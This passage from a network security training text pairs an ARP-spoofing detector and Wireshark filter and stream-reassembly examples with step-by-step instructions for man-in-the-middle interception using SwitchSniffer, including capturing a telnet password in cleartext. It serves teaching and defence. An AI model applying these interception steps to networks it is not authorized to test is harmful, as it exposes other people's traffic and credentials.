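        sender_mac = sender_mac.lower()
        old = self.bindings.get(sender_ip)
        if old is not None and old != sender_mac:
            # A gateway that changes MAC is the classic man-in-the-middle sign.
            sev = "CRITICAL" if sender_ip == self.gateway_ip else "WARNING"
            alerts.append(f"{sev} {ts}: {sender_ip} changed {old} -> {sender_mac}")
        self.bindings[sender_ip] = sender_mac
        self.ips_by_mac[sender_mac].add(sender_ip)
        claimed = len(self.ips_by_mac[sender_mac])
        if claimed > self.max_ips_per_mac:
            alerts.append(f"WARNING {ts}: {sender_mac} now claims {claimed} IPs")
        return alerts


def scan_arp_log(records, **kwargs):
    """Run every record through one watcher and collect all alerts."""
    watcher = ArpWatcher(**kwargs)
    alerts = []
    for rec in records:
        alerts.extend(watcher.observe(*rec))
    return alerts


# Constructed ARP log: (timestamp, opcode, sender_ip, sender_mac).
# From ts=5 on, host .121's MAC starts answering for the gateway and for .194.
SAMPLE_ARP = [
    (1, 2, "192.168.0.1",   "00:1a:2b:3c:4d:01"),
    (2, 2, "192.168.0.121", "00:1a:2b:3c:4d:21"),
    (3, 2, "192.168.0.194", "00:1a:2b:3c:4d:94"),
    (4, 1, "192.168.0.50",  "00:1a:2b:3c:4d:50"),   # request: ignored
    (5, 2, "192.168.0.1",   "00:1A:2B:3C:4D:21"),   # gateway "moved" to .121's MAC
    (6, 2, "192.168.0.194", "00:1a:2b:3c:4d:21"),   # victim "moved" as well
]

if __name__ == "__main__":
    for line in scan_arp_log(SAMPLE_ARP):
        print(line)
```

Static ARP entries for the gateway on critical hosts, and DHCP-snooping-backed ARP inspection on the switch, stop the attack itself; the watcher above is the detection layer that tells you it was attempted.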

The SwitchSniffer tool performs ARP spoofing
Step 1: install it
Step 2: after installation, the program displays the IP and MAC information.
Step 3: set the ARP spoofing attack options:
<-> gateway: spoof the IP-MAC on both the gateway and the attacked machine
<- gateway: only spoof the MAC towards the selected target machine
-> gateway: only spoof the MAC on the gateway (this case is used against machines that have security software installed).
Step 4: scan the network and choose the machine to ARP attack
Click Start to launch the ARP attack; once it runs, all traffic between the attacked machine and the gateway passes through this machine.
e. Sniffing model using an ARP attack helper tool
(Figure: Switch; VMware bridged network; VM1 running SwitchSniffer to redirect the traffic flow; VM2 running the sniffing tools Wireshark, Cain and Colasoft; Router)
The attack model consists of two virtual machines:
VM1 has the SwitchSniffer tool installed and performs the ARP attack, so all traffic of the attacked machine must pass through VM1 before it reaches the network.
VM2 shares the same bridged hub as VM1, so any packet that enters VM1 is also received by VM2; on VM2 the sniffing tools such as Colasoft, Wireshark and Cain & Abel are installed to capture the traffic on the network.
5. The Metasploit exploitation tool
a. Overview of the Metasploit tool
(screenshots only in this copy)
b. Using the Metasploit Framework
(screenshots only in this copy)
c. Conclusion
The Metasploit Framework is an effective tool for carrying out network security testing of a system. The Metasploit Framework provides scanning and exploitation tools and produces reports on the vulnerabilities found.
6. Using Wireshark and Colasoft for packet analysis
After building the sniffing model above, install the sniffing tools on VM2 to perform the capture.
d. Using Wireshark to analyse packets and network traffic
Installing Wireshark
After installation, running Wireshark allows a Capture Filter (selecting only certain IPs, sessions or service ports) for the capture. Alternatively, after capturing, Wireshark allows filtering out the information needed.
Wireshark capturing the needed information
Choose the network card to capture on and set a Capture Filter to capture only what is needed.
Capture Filter syntax:
- to or from: host IP; net 192.168.0.0/24
- to: dst host IP; dst net IP
- from: src host IP
- port: port 53; tcp port 80; tcp portrange 1-500; dst port 80 or dst port 443
- combined: (host 192.168.0.1 and host 192.168.0.50) and (port 80 or 443)
After capturing, we can filter to pull out the information needed.
Display filter syntax for captured packets:
- to or from: ip.addr==IP
- to: ip.dst==IP
- from: ip.src==IP
- except: ip.addr!=IP
- port: tcp.port eq 80 or tcp.port eq 443
- combined: (ip.addr==IP1 and ip.addr==IP2) and (tcp.port eq 80 or tcp.port eq 443)
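To make the semantics of these display filters concrete, here is an added example that is not part of the original document or of Wireshark: a small recursive-descent parser and evaluator for exactly the subset shown (ip.addr, ip.src, ip.dst, tcp.port and friends; == / eq, != / ne; and, or, not; parentheses) run over constructed packet records. The point worth seeing in code is that ip.addr and tcp.port are multi-valued fields: ip.addr==X is true when either the source or the destination matches. Older Wireshark releases evaluated ip.addr!=X as "either address differs", which almost never excludes a host; this evaluator implements the "except" meaning the table intends, which is the same as !(ip.addr==X), the unambiguous form to type in any version.

```python
"""Evaluator for a Wireshark display-filter subset over packet dicts.
Added example; the packets below are constructed."""
import re

TOKEN_RE = re.compile(r"\s*(\(|\)|==|!=|&&|\|\||!|[A-Za-z_][\w.]*|\d+(?:\.\d+){0,3})")

# Field name -> packet keys it covers (multi-valued fields have two keys).
FIELDS = {
    "ip.addr": ("src_ip", "dst_ip"), "ip.src": ("src_ip",), "ip.dst": ("dst_ip",),
    "tcp.port": ("sport", "dport"), "tcp.srcport": ("sport",), "tcp.dstport": ("dport",),
}
OPS = {"==": "eq", "eq": "eq", "!=": "ne", "ne": "ne"}


def tokenize(text):
    pos, toks = 0, []
    text = text.strip()
    while pos < len(text):
        m = TOKEN_RE.match(text, pos)
        if not m:
            raise ValueError(f"bad filter near {text[pos:]!r}")
        toks.append(m.group(1))
        pos = m.end()
    return toks


class Parser:
    """expr := term ('or' term)*; term := factor ('and' factor)*;
    factor := '(' expr ')' | 'not' factor | FIELD OP VALUE"""

    def __init__(self, text):
        self.toks, self.i = tokenize(text), 0

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else None

    def take(self, expected=None):
        tok = self.peek()
        if tok is None or (expected is not None and tok != expected):
            raise ValueError(f"expected {expected!r}, got {tok!r}")
        self.i += 1
        return tok

    def parse(self):
        node = self.expr()
        if self.peek() is not None:
            raise ValueError(f"trailing token {self.peek()!r}")
        return node

    def expr(self):
        node = self.term()
        while self.peek() in ("or", "||"):
            self.take()
            node = ("or", node, self.term())
        return node

    def term(self):
        node = self.factor()
        while self.peek() in ("and", "&&"):
            self.take()
            node = ("and", node, self.factor())
        return node

    def factor(self):
        tok = self.peek()
        if tok == "(":
            self.take("(")
            node = self.expr()
            self.take(")")
            return node
        if tok in ("not", "!"):
            self.take()
            return ("not", self.factor())
        field = self.take()
        if field not in FIELDS:
            raise ValueError(f"unknown field {field!r}")
        op = OPS.get(self.take())
        if op is None:
            raise ValueError("operator must be ==, eq, != or ne")
        return ("cmp", field, op, self.take())


def evaluate(node, pkt):
    kind = node[0]
    if kind == "or":
        return evaluate(node[1], pkt) or evaluate(node[2], pkt)
    if kind == "and":
        return evaluate(node[1], pkt) and evaluate(node[2], pkt)
    if kind == "not":
        return not evaluate(node[1], pkt)
    _, field, op, value = node
    values = [str(pkt[k]) for k in FIELDS[field]]
    if op == "eq":
        return value in values          # any of the field's values matches
    return value not in values          # "except": none of them matches


def matching(filter_text, packets):
    """Indices of the packets the display filter selects."""
    tree = Parser(filter_text).parse()
    return [i for i, p in enumerate(packets) if evaluate(tree, p)]


# Constructed packets mirroring the telnet session discussed in the text.
PACKETS = [
    {"src_ip": "192.168.0.121", "dst_ip": "192.168.0.194", "sport": 51234, "dport": 23},
    {"src_ip": "192.168.0.194", "dst_ip": "192.168.0.121", "sport": 23, "dport": 51234},
    {"src_ip": "192.168.0.121", "dst_ip": "203.0.113.10", "sport": 51240, "dport": 443},
    {"src_ip": "192.168.0.50", "dst_ip": "192.168.0.1", "sport": 40000, "dport": 80},
]

if __name__ == "__main__":
    print(matching("ip.addr==192.168.0.194", PACKETS))
```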
Setting the view to a whole session (Follow TCP Stream)
Looking at the result, a whole telnet session between the machine 192.168.0.121 and the machine 192.168.0.194 can be seen.

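What Follow TCP Stream does to produce that view, as an added example that is not part of the original document or of Wireshark: the captured segments of one connection are separated by direction, ordered by sequence number, retransmitted bytes are dropped and gaps are padded, and each direction becomes one byte stream. The segments below are constructed to imitate the telnet session in the text (client 192.168.0.121, server 192.168.0.194, port 23), with one segment captured out of order and one retransmission; the reassembled client stream shows why a sniffer on the path sees the login name and password of a telnet session in cleartext, which is the reason to replace telnet with SSH.

```python
"""Reassemble both directions of a TCP session from captured segments,
as Follow TCP Stream does. Added example; the segments are constructed."""

CLIENT = "192.168.0.121:51234"
SERVER = "192.168.0.194:23"


def reassemble_direction(segments):
    """segments: list of (seq, payload) for one direction, in any order.
    Returns the byte stream starting at the lowest sequence number seen.
    Retransmitted bytes are dropped; uncaptured gaps are padded with NULs."""
    if not segments:
        return b""
    segments = sorted(segments, key=lambda s: s[0])
    start = segments[0][0]
    stream = bytearray()
    for seq, data in segments:
        offset = seq - start
        if offset > len(stream):                     # a segment was not captured
            stream.extend(b"\x00" * (offset - len(stream)))
        overlap = len(stream) - offset               # bytes we already have
        if overlap >= len(data):
            continue                                 # pure retransmission
        stream.extend(data[overlap:])                # keep only the new bytes
    return bytes(stream)


def follow_tcp_stream(packets, client, server):
    """packets: dicts with src, dst ("ip:port"), seq and payload.
    Returns (client_to_server_bytes, server_to_client_bytes)."""
    c2s = [(p["seq"], p["payload"]) for p in packets
           if p["src"] == client and p["dst"] == server and p["payload"]]
    s2c = [(p["seq"], p["payload"]) for p in packets
           if p["src"] == server and p["dst"] == client and p["payload"]]
    return reassemble_direction(c2s), reassemble_direction(s2c)


def client_lines(client_stream):
    """Split the client's keystrokes into the lines it sent. For telnet the
    first two lines are the login name and the password, in cleartext."""
    text = client_stream.replace(b"\r\n", b"\n").decode("ascii", errors="replace")
    return [line for line in text.split("\n") if line]


# Constructed capture: out-of-order delivery and one retransmitted segment.
SAMPLE_SEGMENTS = [
    {"src": SERVER, "dst": CLIENT, "seq": 1000, "payload": b"login: "},
    {"src": CLIENT, "dst": SERVER, "seq": 5000, "payload": b"a"},
    {"src": CLIENT, "dst": SERVER, "seq": 5002, "payload": b"m"},      # before 'd'
    {"src": CLIENT, "dst": SERVER, "seq": 5001, "payload": b"d"},
    {"src": CLIENT, "dst": SERVER, "seq": 5002, "payload": b"m"},      # retransmission
    {"src": CLIENT, "dst": SERVER, "seq": 5003, "payload": b"in"},
    {"src": CLIENT, "dst": SERVER, "seq": 5005, "payload": b"\r\n"},
    {"src": SERVER, "dst": CLIENT, "seq": 1007, "payload": b"Password: "},
    {"src": CLIENT, "dst": SERVER, "seq": 5007, "payload": b"s3cret"},
    {"src": CLIENT, "dst": SERVER, "seq": 5013, "payload": b"\r\n"},
    {"src": SERVER, "dst": CLIENT, "seq": 1017, "payload": b""},        # pure ACK
]

if __name__ == "__main__":
    c2s, s2c = follow_tcp_stream(SAMPLE_SEGMENTS, CLIENT, SERVER)
    print("server ->", s2c)
    print("client ->", c2s)
```

Wireshark colours the two directions differently in its Follow window; the logic is the same two reassembled streams shown here.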
e. Using Colasoft to analyse network traffic
While Wireshark is a free tool that an administrator can use to analyse packets and view network bandwidth, Wireshark is still not very strong at building real-time dashboards or producing smart reports.
All of these shortcomings of Wireshark are addressed by the professional packet and traffic analysis tool Colasoft:
Installing the Colasoft features
Colasoft has features that complement sniffing; after installation it allows capturing:
- Choose one or more network cards to capture on
- The current bandwidth on the capture network card
- Click Start
Initial interface
Summary of traffic, packets and addresses
Session, IP and application analysis
Summary of network protocols
Summary of the traffic from a specific endpoint
Summary of sessions
Detailed analysis of packet structure
Real-time sessions
System log together with very smart reporting
Colasoft also allows more detailed filtering than Wireshark; together with its other features, Colasoft is truly an extremely powerful network traffic analysis tool, and it can be used in a real network to troubleshoot network incidents.
VII. CONCLUSION
This document gives the reader the most basic concepts of security and information assurance as well as in-depth knowledge. From this knowledge the reader gains an overview of the solutions for building a secure network system. Skill in using scanning and exploitation tools helps administrators detect the risks in their systems before a hacker can find them.